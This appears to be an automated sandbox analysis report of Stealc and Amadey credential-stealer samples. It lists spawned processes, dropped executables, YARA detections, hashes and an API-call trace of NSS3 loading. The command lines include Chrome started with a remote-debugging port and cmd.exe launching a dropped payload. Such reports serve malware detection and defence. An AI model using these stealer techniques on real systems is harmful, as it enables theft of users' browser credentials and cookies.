2024-11-15 13:10:25 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="

Target ID:	0
Start time:	08:09:03
Start date:	15/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x7f0000
File size:	1'812'480 bytes
MD5 hash:	A8916B1DB51981824CF0545DF6864FB9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2043049111.00000000007F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1717266617.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2044630050.000000000160E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:09:10
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:09:11
Start date:	15/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	08:09:11
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2184,i,1981261483455303516,8832434919170921423,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:09:36
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsGDHIDHIEGI.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:09:36
Start date:	15/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:09:36
Start date:	15/11/2024
Path:	C:\Users\user\DocumentsGDHIDHIEGI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DocumentsGDHIDHIEGI.exe"
Imagebase:	0x680000
File size:	3'243'008 bytes
MD5 hash:	314E0BB891690BF44AB39895FC0AC49F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2128190880.0000000000681000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:09:42
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x5d0000
File size:	3'243'008 bytes
MD5 hash:	314E0BB891690BF44AB39895FC0AC49F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2142964969.00000000005D1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:10:00
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x5d0000
File size:	3'243'008 bytes
MD5 hash:	314E0BB891690BF44AB39895FC0AC49F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	08:10:15
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006431001\stories.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006431001\stories.exe"
Imagebase:	0x400000
File size:	6'233'398 bytes
MD5 hash:	CBB34D95217826F4AD877E7E7A46B69C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	08:10:16
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp" /SL5="$40464,5532893,721408,C:\Users\user\AppData\Local\Temp\1006431001\stories.exe"
Imagebase:	0x400000
File size:	2'532'352 bytes
MD5 hash:	D39963C7160D31F9EF536BECF3004498
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	08:10:18
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net.exe" pause shine-encoder_11152
Imagebase:	0xc40000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:10:18
Start date:	15/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:10:18
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe" -i
Imagebase:	0x400000
File size:	3'766'874 bytes
MD5 hash:	F978D5EBA9977AF32374DCB616CB63FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 33%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	08:10:18
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 pause shine-encoder_11152
Imagebase:	0x540000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:10:25
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"
Imagebase:	0x2b0000
File size:	1'848'320 bytes
MD5 hash:	EC1204EE4264E2DDE75A9BADC5023363
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:10:34
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe"
Imagebase:	0xb0000
File size:	1'812'480 bytes
MD5 hash:	A8916B1DB51981824CF0545DF6864FB9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000014.00000003.2633611345.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000014.00000002.2677024586.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000014.00000002.2675232544.00000000000B1000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
Antivirus matches:	Detection: 42%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:10:37
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"
Imagebase:	0x2b0000
File size:	1'848'320 bytes
MD5 hash:	EC1204EE4264E2DDE75A9BADC5023363
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2731254010.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2754591529.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2733750270.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	08:10:39
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:
File size:	3'243'008 bytes
MD5 hash:	314E0BB891690BF44AB39895FC0AC49F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	08:10:45
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"
Imagebase:	0x2b0000
File size:	1'848'320 bytes
MD5 hash:	EC1204EE4264E2DDE75A9BADC5023363
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2847172731.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2845226823.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:10:45
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe"
Imagebase:	0x600000
File size:	2'790'400 bytes
MD5 hash:	273688D08CE0EDD09E29A0A0D2FEAF6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:10:53
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe"
Imagebase:	0xb0000
File size:	1'812'480 bytes
MD5 hash:	A8916B1DB51981824CF0545DF6864FB9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000019.00000002.2861182508.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000019.00000003.2815171977.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000019.00000002.2858405616.00000000000B1000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:10:57
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	08:10:57
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2060,i,14162589029449352878,1805181848931644681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	08:11:01
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:11:01
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1924,i,14623625801092511307,12696391534601995446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	08:11:01
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"
Imagebase:	0x2b0000
File size:	1'848'320 bytes
MD5 hash:	EC1204EE4264E2DDE75A9BADC5023363
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	08:11:11
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	08:11:11
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1180,i,9199522275752105245,15010947955167671813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	08:11:15
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	08:11:15
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=2008,i,10237018931466361704,17092853076335079312,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	08:11:15
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"
Imagebase:	0x2b0000
File size:	1'848'320 bytes
MD5 hash:	EC1204EE4264E2DDE75A9BADC5023363
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.3158403320.000000000121D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	08:11:21
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3924 --field-trial-handle=2060,i,14162589029449352878,1805181848931644681,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	08:11:24
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe"
Imagebase:	0x600000
File size:	2'790'400 bytes
MD5 hash:	273688D08CE0EDD09E29A0A0D2FEAF6D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	08:11:45
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	08:11:45
Start date:	15/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1884,i,5161667279183471165,5132445376536631529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 6C716E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C862120,6C717E60), ref: 6C716EBC
TlsGetValue.KERNEL32 ref: 6C716EDF
EnterCriticalSection.KERNEL32(?), ref: 6C716EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C716F25

Part of subcall function 6C6EA900: TlsGetValue.KERNEL32(00000000,?,6C8614E4,?,6C684DD9), ref: 6C6EA90F
Part of subcall function 6C6EA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C6EA94F

PR_Unlock.NSS3 ref: 6C716F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C716FA9
TlsGetValue.KERNEL32 ref: 6C7170B4
EnterCriticalSection.KERNEL32(?), ref: 6C7170C8
PR_CallOnce.NSS3(6C8624C0,6C757590), ref: 6C717104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C717117
SECOID_Init.NSS3 ref: 6C717128
PORT_Alloc_Util.NSS3(00000057), ref: 6C71714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C71717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7171A9
PR_NotifyAllCondVar.NSS3 ref: 6C7171CF
PR_Unlock.NSS3 ref: 6C7171DD
free.MOZGLUE(?), ref: 6C7171EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C717208
free.MOZGLUE(00000000), ref: 6C717221
free.MOZGLUE(00000001), ref: 6C717235
TlsGetValue.KERNEL32 ref: 6C71724A
EnterCriticalSection.KERNEL32(?), ref: 6C71725E
PR_NotifyCondVar.NSS3 ref: 6C717273
PR_Unlock.NSS3 ref: 6C717281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C717291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7172B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7172D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7172E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C717301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C717310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C717335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C717344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C717363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C717372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C850148,,defaultModDB,internalKeySlot), ref: 6C7174CC
free.MOZGLUE(00000000), ref: 6C717513
free.MOZGLUE(00000000), ref: 6C71751B
free.MOZGLUE(00000000), ref: 6C717528
free.MOZGLUE(00000000), ref: 6C71753C
free.MOZGLUE(00000000), ref: 6C717550
free.MOZGLUE(00000000), ref: 6C717561
free.MOZGLUE(00000000), ref: 6C717572
free.MOZGLUE(00000000), ref: 6C717583
free.MOZGLUE(00000000), ref: 6C717594
free.MOZGLUE(00000000), ref: 6C7175A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C7175BD
free.MOZGLUE(00000000), ref: 6C7175C8
free.MOZGLUE(00000000), ref: 6C7175F1
PR_NewLock.NSS3 ref: 6C717636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C717686
PR_NewLock.NSS3 ref: 6C7176A2

Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C7176B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C717707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C71771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C717731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C71774A
DeleteCriticalSection.KERNEL32(?), ref: 6C717770
free.MOZGLUE(?), ref: 6C717779
